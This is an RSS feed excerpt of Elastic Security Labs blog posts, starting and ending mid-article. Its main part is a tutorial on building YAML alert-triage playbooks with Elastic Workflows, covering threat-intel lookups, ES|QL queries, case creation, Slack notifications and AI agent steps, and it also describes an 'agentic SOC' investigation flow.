<p>These capabilities turn artifact collection into an embedded  step of the investigation, rather than a separate workflow, so teams can confirm what happened all in one platform and act sooner.</p>
<h2>Response actions that keep investigations moving</h2>
<p>Once investigators confirm malicious behavior, the priority shifts to containment and remediation. Elastic Security XDR enables analysts to take immediate action directly from the investigation context, isolating a host, terminating suspicious processes, collecting a file from the endpoint, or running a response script to collect additional evidence needed to complete the analysis.</p>
<p>For organizations using third-party EDRs, Elastic Security XDR can orchestrate containment and response across mixed environments, allowing teams to keep investigation, enforcement, and incident record-keeping anchored in a single platform.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image4.png" alt="Isolating a CrowdStrike-managed host directly from Elastic Security" title="Isolating a CrowdStrike-managed host directly from Elastic Security" /></p>
&lt;div className=&quot;youtube-video-container&quot;&gt;
  &lt;iframe width=&quot;560&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/Spgx80WKaqs?si=3XMt0uFsbNEtpcHv&quot; title=&quot;Isolating a CrowdStrike-managed host directly from Elastic Security&quot; frameBorder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&quot; referrerPolicy=&quot;strict-origin-when-cross-origin&quot; allowFullScreen&gt;&lt;/iframe&gt;
&lt;/div&gt;
<h2>Controlling removable media with Device Control</h2>
<p>Investigations often uncover risk paths beyond traditional malware, such as removable media usage or potential USB-based exfiltration. Elastic Security XDR’s Device Control capabilities let teams manage and enforce removable media policies across endpoints, reducing attack surface and preventing unauthorized data transfer.</p>
<p>Device Control also allows teams to automatically block USB devices and maintain a trusted set of approved devices, ensuring policies are enforced consistently across all endpoints.</p>
<h2>Scaling response with Elastic Workflows</h2>
<p>Incident response often follows repeatable steps. When an alert fires, teams enrich it, gather evidence, contain affected hosts, open cases, notify responders, and document decisions, ensuring investigations persist across handoffs and shift changes.</p>
<p><a href="https://www.elastic.co/search-labs/blog/elastic-workflows-automation">Elastic Workflows</a> gives teams a way to encode those steps as a reusable playbook that runs inside the Elastic platform. Workflows are defined declaratively in YAML in Kibana, and can be triggered in multiple ways: when a Kibana alerting rule fires, on a schedule, or manually on demand.</p>
<p>From there, a workflow can execute a sequence of steps that look a lot like what an analyst would do manually:</p>
<ul>
<li>Query Elastic data (including ES|QL), transform results, and branch based on conditions</li>
<li>Create or update a Case, attach supporting context, and keep an auditable record of what was collected and why.</li>
<li>Notify downstream systems (Slack, Jira, PagerDuty, and other services) using connectors you’ve already configured, or call internal/external APIs via HTTP steps.</li>
</ul>
<p>This becomes especially impactful when paired with endpoint response capabilities. When an alert fires, teams can automatically isolate the host and kick off a standardized evidence bundle - capture a memory dump, collect a suspicious file (get-file), and list running processes - so responders have what they need immediately.</p>
<p>The net effect is faster execution of the first steps in incident response, while investigations follow consistent playbooks across analysts and shifts. Instead of relying on memory and manual checklists, Workflows helps enforce a repeatable investigation standard and makes it easier to scale response when alert volume spikes.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image1.png" alt="Alert Triage workflow built with Elastic Workflows native automation." title="Alert Triage workflow built with Elastic Workflows native automation." /></p>
<h2>Elastic Security Labs - Research that powers real-world defenses</h2>
<p>Elastic Security is informed by the work of <a href="https://www.elastic.co/security-labs/about">Elastic Security Labs</a>, a team dedicated to studying real adversary behavior and translating those findings into practical detection and investigation guidance. Threat Command tracks emerging techniques, malware activity, and endpoint tradecraft, then turns that research into updates that matter in day-to-day security operations: new and refined detection rules, improvements to prevention logic, and clearer guidance on how to investigate what you’re seeing.</p>
<p>Elastic Security Labs also publishes technical write-ups and analyses to help the broader community understand how threats operate in the wild. For defenders, that research provides useful context behind detections - why a technique matters, what evidence to look for, and how to scope impact once an alert fires.</p>
<h2>Tying it all together</h2>
<p>As a core capability of our agentic security operations platform, Elastic Security XDR unifies traditionally siloed defenses to tackle the speed and complexity of modern threats. An initial host-based signal can quickly spread across endpoints, identities, and cloud services. Agentic workflows and agent skills help analysts investigate and respond at machine speed. Analysts no longer need to stitch together disconnected tools - they can follow attacker activity throughout the environment, combining endpoint prevention with autonomous investigative and response capabilities in a single platform.</p>
<h2>Learn More</h2>
<p>Visit <a href="https://elastic.co/security/xdr">elastic.co/security/xdr</a> to learn more. Try a free <a href="https://cloud.elastic.co/serverless-registration">Elastic Security trial</a>, explore Elastic Defend with our <a href="https://videos.elastic.co/watch/wVJRXJQR5orNBEkjgUbVRq">Getting Started video</a>, or practice with real malware at <a href="https://ohmymalware.com">ohmymalware.com</a>.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/investigating-from-the-endpoint-across-your-environment.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Security Automation with Elastic Workflows: From Alert to Response]]></title>
            <link>https://www.elastic.co/security-labs/security-automation-with-elastic-workflows</link>
            <guid>security-automation-with-elastic-workflows</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[A practical guide to building intelligent, automated security playbooks with Elastic Workflows.]]></description>
            <content:encoded><![CDATA[<h2>The daily loop</h2>
<p>An alert fires. You open it. You read through the details. You gather context from the surrounding activity. You check for related signals across your environment. You decide what it means and what to do next. Sometimes you escalate. Sometimes you close it and move on.</p>
<p>You do this dozens of times a day. The steps are almost always the same. The data you need is already in your SIEM. The actions you take are predictable. But the work is still manual.</p>
<p>This is the kind of work that automation should handle. Not because it's hard, but because it's repetitive, and every minute spent on repetitive manual triage is a minute not spent on the alerts that actually need a human.</p>
<p>Elastic Workflows brings that automation into the SIEM itself. No separate tool. No integration to build. Your detection rule fires, and a workflow runs, with direct access to your alerts, cases, and security data.</p>
<p>This blog post walks through building a security playbook with Workflows, step by step. We'll start simple and build up to a workflow that runs when an alert fires, checks threat intel, gathers context, creates cases, notifies the team, and brings in AI when the investigation calls for it.</p>
<p>If you're new to Workflows, the <a href="https://www.elastic.co/search-labs/blog/elastic-workflows-automation">introductory technical deep dive</a> blog and <a href="https://www.youtube.com/watch?v=Tu505Zn1wUc">video</a> cover the core concepts of Workflows. This post focuses on applying these concepts in a security context.</p>
<h2>Quick orientation</h2>
<p>Workflows are YAML definitions that run inside Kibana. You define what should happen, and the platform handles execution. At a high level, a workflow is composed of three main parts: triggers (when it runs), steps (what it does), and data flow (how information moves between steps).</p>
<p><a href="https://www.elastic.co/docs/explore-analyze/workflows/triggers"><strong>Triggers</strong></a> decide when the workflow runs. An alert trigger runs on a detection. A scheduled trigger runs on a cadence. A manual trigger runs on demand. A workflow can have more than one.</p>
<p><a href="https://www.elastic.co/docs/explore-analyze/workflows/steps"><strong>Steps</strong></a> define what the workflow does. They run in order and can use outputs from earlier steps. They can query data in <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/elasticsearch">Elasticsearch</a>, update alerts and cases in <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/kibana">Kibana</a>, and <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/external-systems-apps">call external systems</a> like sending a Slack message or scanning a hash on VirusTotal. They can also apply logic such as conditionals or loops, and use <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/ai-steps">AI</a> for tasks like summarizing text, prompting an LLM, or invoking agents when deeper reasoning is needed.</p>
<p>This is the toolkit. With these primitives, you can build workflows that take a signal, gather context, and drive a response.</p>
<h2>Building a security playbook</h2>
<p>We'll build an alert triage workflow incrementally. Each section adds a capability, and by the end, you'll have a working playbook that handles the full triage loop.</p>
<h3>Start with the trigger</h3>
<p>Security workflows start with an event. It could be an alert, a case update, a user action, or a scheduled check. The workflow takes that signal, gathers context, and decides what to do next.</p>
<p>We’ll start with alert triage. It’s the most common path, and it shows the full loop end to end. Each section adds a capability, and by the end, you’ll have a working playbook.</p>
<p>Here’s a minimal workflow with an alert trigger:</p>
<pre><code class="language-yaml">name: Alert Triage Playbook
description: Enriches alerts, checks threat intel, creates a case, and notifies the team.
enabled: true
tags:
  - security
  - triage

triggers:
  - type: alert

steps:
  # we'll build these out
</code></pre>
<p>The <code>alert</code> trigger connects this workflow to detection rules. You link a specific rule to this workflow from the rule's <strong>Actions</strong> settings in Kibana. When the rule fires, the workflow runs and receives the full alert context through the <code>event</code> variable. That includes <code>event.alerts</code> (the alert documents), <code>event.rule</code> (the rule metadata), and every field on the alert.</p>
<p>From here, you start adding steps.</p>
<h3>Check threat intel</h3>
<p>The first real step: take the file hash from the alert and check it against VirusTotal. Workflows have a built-in VirusTotal connector, so you don't need to construct HTTP requests or manage API keys in your YAML (connector credentials like VirusTotal API keys or Slack tokens are configured once in the connector under <strong>Stack Management &gt; Connectors</strong>):</p>
<pre><code class="language-yaml">  - name: check_virustotal
    type: virustotal.scanFileHash
    connector-id: &quot;my-virustotal&quot;
    with:
      hash: &quot;{{ event.alerts[0].file.hash.sha256 }}&quot;
    on-failure:
      retry:
        max-attempts: 2
        delay: 3s
      continue: true
</code></pre>
<p>Every step in a workflow follows a simple, consistent structure. It starts with a <code>name</code>, which gives the step a clear identity, and a <code>type</code>, which defines the action being performed. In this case, the step calls the VirusTotal file hash scan capability. Because this is a connector-backed action, it also includes a <code>connector-id</code>, which tells the workflow which configured integration to use, including its credentials.</p>
<p>The <code>with</code> block is where you pass inputs into the step. Each step type defines the parameters it accepts. Here, you provide the file hash to scan. Rather than hardcoding values, workflows use a built-in templating engine powered by LiquidJS. The <code>{{ }}</code> syntax lets you <a href="https://www.elastic.co/docs/explore-analyze/workflows/data#workflows-dynamic-values">reference data from the execution context</a>, so the hash is pulled directly from the alert that triggered the workflow.</p>
<p>Finally, the <code>on-failure</code> block defines how the step behaves if something goes wrong. In this case, it retries twice with a short delay and continues execution even if the lookup fails. This is important in production workflows, where a transient external API issue should not block the entire triage process.</p>
<h3>Gather context with ES|QL</h3>
<p>Next, query for related alerts on the same host. ES|QL runs directly against your security indices, so there's no API bridging or credential management:</p>
<pre><code class="language-yaml">  - name: related_alerts
    type: elasticsearch.esql.query
    with:
      query: |
        FROM .alerts-security*
        | WHERE host.name == &quot;{{ event.alerts[0].host.name }}&quot;
        | WHERE @timestamp &gt; NOW() - 24 hours
        | STATS
            alert_count = COUNT(*),
            rules_triggered = VALUES(kibana.alert.rule.name),
            users_involved = VALUES(user.name)
      format: json
</code></pre>
<p>This tells you whether the host has been generating other alerts, which rules triggered, and which users were involved. That context is included in the case description and informs the severity assessment later.</p>
<p>The same approach works for any enrichment that touches data in Elasticsearch: looking up a user's first-seen date, checking how many times a hash has appeared in your logs, or pulling the process tree from endpoint data. If the data is in your cluster, ES|QL can get it.</p>
<h3>Branch on findings</h3>
<p>Now the workflow needs to decide what to do. If VirusTotal flagged the file as malicious, create a case and respond. If not, close the alert as a false positive:</p>
<pre><code class="language-yaml">  - name: check_malicious
    type: if
    condition: steps.check_virustotal.output.stats.malicious &gt; 5
    steps:
      # true positive path: steps below
    else:
      - name: close_false_positive
        type: kibana.SetAlertsStatus
        with:
          status: closed
          reason: false_positive
          signal_ids:
            - &quot;{{ event.alerts[0]._id }}&quot;
</code></pre>
<p>The <code>if</code> step evaluates a condition and runs different steps depending on the result. The false positive path closes the alert in a single step. The true positive path continues below.</p>
<h3>Create a case</h3>
<p>When the alert is confirmed malicious, open a case with context from previous steps:</p>
<pre><code class="language-yaml">      - name: create_case
        type: kibana.createCase
        with:
          title: &quot;Malware Detected: {{ event.alerts[0].file.hash.sha256 }}&quot;
          description: |
            Confirmed malicious file detected on {{ event.alerts[0].host.name }}.

            **Detection:** {{ event.rule.name }}
            **User:** {{ event.alerts[0].user.name }}
            **VirusTotal:** {{ steps.check_virustotal.output.stats.malicious }} engines flagged this file
            **Related alerts (24h):** {{ steps.related_alerts.output.values[0][0] }} 
              alerts from {{ steps.related_alerts.output.values[0][1] | size }} rules
          owner: securitySolution
          severity: high
          tags:
            - automation
            - malware
          settings:
            syncAlerts: false
          connector:
            id: none
            name: none
            type: &quot;.none&quot;
            fields: null
</code></pre>
<p><a href="https://www.elastic.co/docs/explore-analyze/workflows/data#workflows-dynamic-values">Liquid templating</a> pulls data from the alert (<code>event</code>), from the VirusTotal results (<code>steps.check_virustotal.output</code>), and from the ES|QL query (<code>steps.related_alerts.output</code>). Every field from every previous step is available to every subsequent step.</p>
<h3>Notify the team</h3>
<p>Send a Slack message so the team knows a confirmed case is open:</p>
<pre><code class="language-yaml">      - name: notify_team
        type: slack
        connector-id: &quot;security-alerts&quot;
        with:
          message: |
            Malware confirmed on {{ event.alerts[0].host.name }}.
            VirusTotal: {{ steps.check_virustotal.output.stats.malicious }} detections.
            Case created: {{ steps.create_case.output.id }}
</code></pre>
<p>Slack is one option. Jira, ServiceNow, PagerDuty, Microsoft Teams, email, and Opsgenie are all supported as connector steps.</p>
<h3>The complete workflow</h3>
<p>Here's the full workflow assembled:</p>
<pre><code class="language-yaml">name: Alert Triage Playbook
description: Enriches alerts, checks threat intel, creates a case, and notifies the team.
enabled: true
tags:
  - security
  - triage

triggers:
  - type: alert

steps:
  - name: check_virustotal
    type: virustotal.scanFileHash
    connector-id: &quot;my-virustotal&quot;
    with:
      hash: &quot;{{ event.alerts[0].file.hash.sha256 }}&quot;
    on-failure:
      retry:
        max-attempts: 2
        delay: 3s
      continue: true

  - name: related_alerts
    type: elasticsearch.esql.query
    with:
      query: |
        FROM .alerts-security*
        | WHERE host.name == &quot;{{ event.alerts[0].host.name }}&quot;
        | WHERE @timestamp &gt; NOW() - 24 hours
        | STATS
            alert_count = COUNT(*),
            rules_triggered = VALUES(kibana.alert.rule.name),
            users_involved = VALUES(user.name)
      format: json

  - name: check_malicious
    type: if
    condition: steps.check_virustotal.output.stats.malicious &gt; 5
    steps:
      - name: create_case
        type: kibana.createCase
        with:
          title: &quot;Malware Detected: {{ event.alerts[0].file.hash.sha256 }}&quot;
          description: |
            Confirmed malicious file detected on {{ event.alerts[0].host.name }}.

            **Detection:** {{ event.rule.name }}
            **User:** {{ event.alerts[0].user.name }}
            **VirusTotal:** {{ steps.check_virustotal.output.stats.malicious }} engines flagged this file
            **Related alerts (24h):** {{ steps.related_alerts.output.values[0][0] }} 
              alerts from {{ steps.related_alerts.output.values[0][1] | size }} rules
          owner: securitySolution
          severity: high
          tags:
            - automation
            - malware
          settings:
            syncAlerts: false
          connector:
            id: none
            name: none
            type: &quot;.none&quot;
            fields: null

      - name: notify_team
        type: slack
        connector-id: &quot;security-alerts&quot;
        with:
          message: |
            Malware confirmed on {{ event.alerts[0].host.name }}.
            VirusTotal: {{ steps.check_virustotal.output.stats.malicious }} detections.
            Case created: {{ steps.create_case.output.id }}

    else:
      - name: close_false_positive
        type: kibana.SetAlertsStatus
        with:
          status: closed
          reason: false_positive
          signal_ids:
            - &quot;{{ event.alerts[0]._id }}&quot;
</code></pre>
<p>That's the triage loop, automated. Alert fires, threat intel checked, context gathered, decision made, case created, team notified. Every execution is logged and auditable.</p>
<p>This is a starting point. The <a href="https://github.com/elastic/workflows/blob/main/workflows/security/response/traditional-triage.yaml">traditional-triage.yaml</a> in the Elastic Workflows library on GitHub goes further: it isolates the host, looks up the on-call analyst, creates a dedicated Slack channel, assigns the case, and posts a rich incident summary. Same patterns, more steps.</p>
<h2>Adding AI to the playbook</h2>
<p>The workflow above handles a defined path. If the hash is malicious, do X; otherwise, do Y. That covers a lot of triage work. But not every alert fits a clean branching condition, and not every case description should be a list of raw fields.</p>
<p>Workflows include AI steps that handle the parts where structured logic runs out. There are three, and they work together.</p>
<h3>Classify: let AI drive the branching</h3>
<p>Instead of branching on a VirusTotal score threshold, use <code>ai.classify</code> to categorize the alert. It considers the full alert context, not just a single number:</p>
<pre><code class="language-yaml">  - name: classify_alert
    type: ai.classify
    with:
      input: &quot;${{ event }}&quot;
      categories:
        - malware
        - phishing
        - lateral_movement
        - data_exfiltration
        - false_positive
      instructions: |
        Classify this security alert based on the alert details,
        rule name, and affected entities.
      includeRationale: true
</code></pre>
<p>The output is structured: <code>steps.classify_alert.output.category</code> returns a single string like <code>&quot;malware&quot;</code> or <code>&quot;false_positive&quot;</code>. That drives the <code>if</code> condition directly. The rationale explains why, and you can include it in the case for audit purposes.</p>
<h3>Summarize: write case descriptions that adapt</h3>
<p>Rather than templating raw field values into a case description, use <code>ai.summarize</code> to generate a readable overview. Run it once before case creation for the initial description, and once after the agent investigation to update the description with the full picture:</p>
<pre><code class="language-yaml">  - name: initial_summary
    type: ai.summarize
    with:
      input: &quot;${{ event }}&quot;
      instructions: |
        Write a one-paragraph overview of this security alert.
        State what was detected, on which host, by which user, and the severity.
        Do not include recommendations. Just the facts.
      maxLength: 300
</code></pre>
<p>The summary adapts to whatever fields are present on the alert, so you don't need to account for every possible field combination in your Liquid templates. Use <code>steps.initial_summary.output.content</code> in the case description and the Slack notification.</p>
<h3>Agent: investigate what the playbook can't</h3>
<p>The <code>ai.agent</code> step invokes an Agent Builder agent. Unlike classify and summarize, an agent has access to tools. It can query your indices, check threat intel, correlate signals across data sources, and reason about what it finds:</p>
<pre><code class="language-yaml">  - name: escalate_to_agent
    type: ai.agent
    agent-id: &quot;security-agent&quot;
    create-conversation: true
    with:
      message: |
        Investigate this alert. Search for related activity on this host,
        check for persistence mechanisms and lateral movement,
        and determine the full scope of the incident.
        Alert: {{ event | json }}
        Classification: {{ steps.classify_alert.output.category }}
        VirusTotal: {{ steps.check_virustotal.output | json }}
        Related alerts: {{ steps.related_alerts.output | json }}
    timeout: 10m
</code></pre>
<p>The agent processes the input, calls whatever tools it needs, and returns its findings. The workflow waits, then continues with the next steps: adding the investigation to the case, notifying the team, and updating the case description with a concise summary of what the agent found.</p>
<p>Setting <code>create-conversation: true</code> persists the conversation, so the workflow can fetch the agent's reasoning trail and add it to the case as a structured comment with clickable links to each query it ran. And the analyst gets a direct link to pick up the conversation with the agent if they want to dig deeper.</p>
<h3>Putting it together</h3>
<p>In the full version of this workflow, the three AI steps work in sequence:</p>
<ol>
<li><strong>Classify</strong> the alert to drive the triage decision</li>
<li><strong>Summarize</strong> the alert for the initial case description and Slack notification</li>
<li><strong>Agent</strong> investigates the full scope: persistence, lateral movement, IOCs, affected systems</li>
<li><strong>Summarize</strong> again, this time distilling the agent's findings into a concise, updated case description</li>
</ol>
<p>The case starts with a clean factual overview and evolves into a comprehensive summary as the investigation completes. The agent's full analysis and reasoning trail live as case comments for analysts who want the details.</p>
<p>The complete workflow, including the AI investigation pipeline with reasoning trails, clickable Discover links, and follow-up Slack notifications, is available in the <a href="https://github.com/elastic/workflows">Elastic Workflows library on GitHub</a>.</p>
<h2>Workflows as agent tools</h2>
<p>The integration between Workflows and Agent Builder works in both directions. Workflows can call agents (as shown above). And agents can call workflows.</p>
<p>When you expose a workflow as a tool in Agent Builder, an agent can invoke it during a conversation. The agent decides what needs to happen, and the workflow handles the execution reliably and repeatably.</p>
<p>This is the pattern demonstrated in the <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">Chrysalis APT blog post</a>: a two-step workflow hands the entire Attack Discovery to an agent, and the agent calls workflow-backed tools to verify malware hashes, search logs, check the on-call schedule, create a case, and spin up a Slack channel. The workflow is the trigger and the safety net. The agent is the brain.</p>
<p>Agents reason. Workflows execute. Together they cover the full range from judgment to action.</p>
<h2>Open by design</h2>
<p>Not every team starts from zero. Some already have automation running in Tines, Splunk SOAR, Palo Alto XSOAR, or another platform. Workflows don't ask you to replace any of your existing tools.</p>
<p>The idea is straightforward: use Workflows for the parts of your automation that are native to Elastic. Alert triage, enrichment from your own indices, case management, and alert status updates. These touch your Elastic data directly, and a native workflow will always be simpler and faster than an external tool making API calls back into Elastic.</p>
<p>For everything else, connectors bridge the gap. We have native connectors for Tines, Resilient, Swimlane, TheHive, D3 Security, Torq, and XSOAR. A workflow can kick off a Tines story, push an incident to Resilient, or trigger any external system via HTTP. Your existing tools handle cross-platform orchestration. Workflows handle what's native. As the capability grows, you can consolidate at your own pace. Nobody's forcing a migration.</p>
<h2>What's here and what's next</h2>
<p>Workflows is available today. Here's what you can build with it today:</p>
<ul>
<li><strong>Alert triggers</strong> connect workflows to detection and alerting rules</li>
<li><strong>Case and alert management</strong> through named Kibana steps (<code>kibana.createCase</code>, <code>kibana.SetAlertsStatus</code>, <code>kibana.addCaseComment</code>, and more)</li>
<li><strong>Direct data access</strong> via Elasticsearch search and ES|QL</li>
<li><strong>39 workflow-compatible connectors</strong> covering threat intel (VirusTotal, AbuseIPDB, GreyNoise, Shodan, URLVoid, AlienVault OTX), ticketing (Jira, ServiceNow), communication (Slack, Teams, PagerDuty, email), SOAR platforms (Tines, Resilient, Swimlane, TheHive, and others), and AI providers</li>
<li><strong>AI steps</strong> for classification, summarization, prompts, and Agent Builder invoking Elastic Agents/Skils</li>
<li><strong>YAML authoring</strong> with autocomplete, validation, and step testing in Kibana</li>
<li><strong>50+ example workflows</strong> on <a href="https://github.com/elastic/workflows">GitHub</a>, including security-specific templates for detection, enrichment, and response</li>
</ul>
<p>What's coming:</p>
<ul>
<li><strong>Visual workflow builder</strong> for drag-and-drop authoring</li>
<li><strong>In-product template library</strong> to browse and install workflows directly in Kibana</li>
<li><strong>Human-in-the-loop</strong> approvals that pause workflows for human input via Slack, email, or the Kibana UI</li>
<li><strong>Natural language authoring</strong> where AI helps translate intent into working workflows</li>
</ul>
<p>Today, authoring is YAML-based. If you've written detection rules or configured CI/CD pipelines, the learning curve is gentle. The editor has built-in autocomplete, validation, and step testing, and the example library gives you templates to start from. A visual builder is coming to make this accessible to a wider audience.</p>
<h2>Get started</h2>
<p>Elastic Workflows is available now. To start building:</p>
<ol>
<li><a href="https://cloud.elastic.co/registration">Start an Elastic Cloud trial</a> or enable Workflows in your existing deployment under <strong>Stack Management &gt; Advanced Settings</strong></li>
<li>Explore the <a href="https://www.elastic.co/docs/explore-analyze/workflows">Workflows documentation</a></li>
<li>Browse the <a href="https://github.com/elastic/workflows">Elastic Workflow Library on GitHub</a> for security templates you can adapt</li>
<li>Read the <a href="https://www.elastic.co/search-labs/blog/elastic-workflows-automation">introductory technical deep dive</a> for core concepts</li>
<li>See the <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">Chrysalis APT blog</a> for a complete Attack Discovery + Workflows + Agent Builder walkthrough</li>
</ol>
<p>Start with the workflow that would save you the most time tomorrow.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/security-automation-with-elastic-workflows/security-automation-with-elastic-workflows.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Streamlining the Security Analyst Experience]]></title>
            <link>https://www.elastic.co/security-labs/streamlining-the-security-analyst-experience</link>
            <guid>streamlining-the-security-analyst-experience</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Alert Triage, Investigation, and Response with Elastic's Agentic Security Operations Platform.]]></description>
            <content:encoded><![CDATA[<p>The term <strong>Agentic SOC (Security Operations Center)</strong> is one of the most popular concepts in security today. But what does it truly mean in practice, and how does Elastic Security approach this next evolution of security operations?</p>
<p>In simple terms, an Agentic SOC is a security operations center that has deployed AI Agents and corresponding AI Agent Skills to perform SOC-related workflows such as detection engineering, alert triage, incident investigation, escalation, response, and threat hunting. When these workflows are performed by AI agents, they’re often called “Agentic workflows.” These AI Agents and Skills may run natively in a security operations platform like SIEM, XDR, or security analytics, or they may be layered on top of legacy SIEM as an “AI SOC Agent” or “AI SOC analyst”, or they may even be run from an AI Coding Tool.</p>
<p>Regardless of how they are implemented, the shift to the Agentic SOC is not about AI replacing human analysts; it's about transforming how the SOC functions. To keep pace with rapidly evolving attackers, defenders must leverage AI and autonomous agents to respond as quickly as possible. At its core, an Agentic SOC is defined by how a security operations center uses <strong>AI and agents to protect against adversaries</strong>.</p>
<p>Let’s simplify a successful security operations center to three fundamental pillars, all of which the Agentic SOC significantly enhances:</p>
<ol>
<li><strong>Observe:</strong> The foundation of all security is centralized data—aggregating logs and events into one location, which is the core strength of a SIEM solution.</li>
<li><strong>Detect:</strong> This involves deploying core protections like endpoint-based security (XDR, such as Elastic Defend) and security solution-focused detections (cloud, identity data). This technology drives the generation of high-quality alerts. Elastic, for example, ships over <a href="https://elastic.github.io/detection-rules-explorer/"><strong>1,700 pre-built rules</strong></a> for its SIEM by default, not including its XDR solution's endpoint rule library.</li>
<li><strong>Act:</strong> This is the critical final stage of triaging, investigating, and acting on the generated alerts.</li>
</ol>
<h2>Agentic SOC in Action</h2>
<p>Imagine this real-life scenario unfolding in your Security Operations Center using the Elastic security platform. It begins not with a siren, but with a simple, direct Slack notification. Building on our recent <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">blog</a> on Attack Discovery, Workflows, and Agent Builder, let's further examine how Elastic Security can help you respond to an active attack.</p>
<ol>
<li><strong>The Initial Alert and Immediate Action</strong><br />
Your security analyst receives an urgent notification in their team channel. This message isn't just a heads-up; it points directly to an observed, active attack. Crucially, the Elastic Agentic SOC has already taken decisive, pre-emptive action: a vulnerable host has been isolated from the network to contain the threat and limit potential damage. This was all powered by Elastic Workflows and Elastic Agent Builder processing realtime alert and attack data from Elastic.<br />
<img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image5.png" alt="Example analyst notification in Slack after the AI agent has performed initial triage." title="Example analyst notification in Slack after the AI agent has performed initial triage." /></li>
<li><strong>The Centralized Case</strong><br />
The analyst's next step is a click away, moving from Slack directly to the centralized Case within Elastic that was created by the workflow. Elastic Case Management enables the SOC to coordinate the response and provides a single pane of glass into all aggregated critical information:</li>
</ol>
<ul>
<li>
<p><strong>Attack Summary:</strong> A high-level overview detailing what has occurred using Attack Discovery.</p>
</li>
<li>
<p><strong>Attached Alerts:</strong> The specific security alerts that triggered the initial observation.</p>
</li>
<li>
<p><strong>Observables:</strong> A list of suspicious artifacts (IP addresses, file hashes, domains, etc.) collected from the event.</p>
</li>
<li>
<p><strong>Attached Events:</strong> Non-alert events that, while not an alert themselves, provide critical context and are of further interest to the investigation.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image2.png" alt="" /></p>
</li>
</ul>
<ol start="3">
<li><strong>Supporting the Investigation</strong><br />
To support the immediate findings, detailed <strong>Investigations</strong> are attached directly to the Case. These searches allow the analyst to visually and contextually step through the sequence of events leading up to, during, and immediately following the attack.<br />
The Elastic Case also provides instant context by highlighting <strong>Similar cases</strong>. By cross-referencing observables, the system identifies previous incidents involving the same entities or artifacts, providing a deeper understanding of the threat actor's history and potential motives.</li>
<li><strong>The Path to Resolution</strong><br />
The agents don’t just catalog the past; it dictates the future. A clear set of <strong>Next steps and actions</strong> are outlined, with specific team members assigned for review and execution.</li>
</ol>
<p>The analyst then steps through a methodical process reviewing the automated analysis:</p>
<ol>
<li><strong>Reviewing Findings:</strong> Scrutinizing all aggregated data, alerts, and investigations.</li>
<li><strong>Evidence Collection:</strong> Collecting any additional forensic evidence needed for a complete analysis.</li>
<li><strong>Remediation:</strong> Executing manual or automated actions, such as deleting malicious files or killing persistent processes on the isolated host with Elastic Defend.</li>
<li><strong>Final Release:</strong> Eventually, the host is safely released back to the network, but not before additional, targeted rules or policies are automatically applied to prevent a recurrence based on the lessons learned from this incident.<br />
In the Agentic SOC, the analyst moves seamlessly from a high-level alert to a comprehensive investigation to full remediation—all within a unified, intelligent workflow powered by Elastic.</li>
</ol>
<h2>Elastic Security and Core SIEM Workflows</h2>
<p>Before exploring advanced agentic workflows, it's essential to recognize that Elastic Security already provides a comprehensive suite of core capabilities crucial for modern security operations. This foundation begins with the ingestion of security-relevant data, which is automatically normalized to a common schema, ensuring consistency and ease of analysis. The platform offers Extended Detection and Response (XDR) capabilities via Elastic Defend, a robust detection engine built directly into the Elastic Stack, and sophisticated alert workflows that include built-in correlations to reduce noise and surface true threats.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image4.png" alt="" /></p>
<p>Elastic Security further differentiates itself by tightly integrating key operational functions. This includes entity-based threat hunting, machine learning for anomaly detection and behavior analysis, and comprehensive case management for tracking incidents. Finally, the platform provides end-to-end response and forensic capabilities, enabling security teams to move swiftly from initial alert to investigation and remediation, all within a unified, scalable platform.</p>
<h2>Empowering Analysts with Agentic Capabilities</h2>
<h3>AI-Powered Alert Triage and Prioritization</h3>
<p>The Elastic Security Solution integrates AI capabilities via <strong>Agent Builder</strong> to augment and make SOC operations truly agentic. This is where efficiency improvements are most keenly felt:</p>
<ul>
<li><strong>Conversational Triage:</strong> A built-in agent is readily available to Tier 1/2 analysts, allowing them to use conversational commands to query and prioritize open alerts (e.g., &quot;What priority alerts should I review from the last 30 days?&quot;). This is the first entry point for using AI to augment SOC operations.</li>
<li><strong>LLM Agnostic Platform:</strong> A key differentiating feature of Elastic's <strong>Agent Builder</strong> is that it is <strong>LLM agnostic</strong>, allowing organizations to pick their preferred model, even locally running models for privacy or regulatory reasons.</li>
<li><strong>Attack Discovery:</strong> This premier feature moves beyond basic triage. It uses LLM configurations to create <strong>higher-order attack detections</strong>, taking hundreds of open alerts and prioritizing them into a small, manageable subset of known attacks or incidents. This dramatically reduces the impact of alert fatigue.</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image3.png" alt="" /></p>
<h3>Enriched Investigations</h3>
<p>Once an attack or incident is found, the agent helps start the investigation:</p>
<ul>
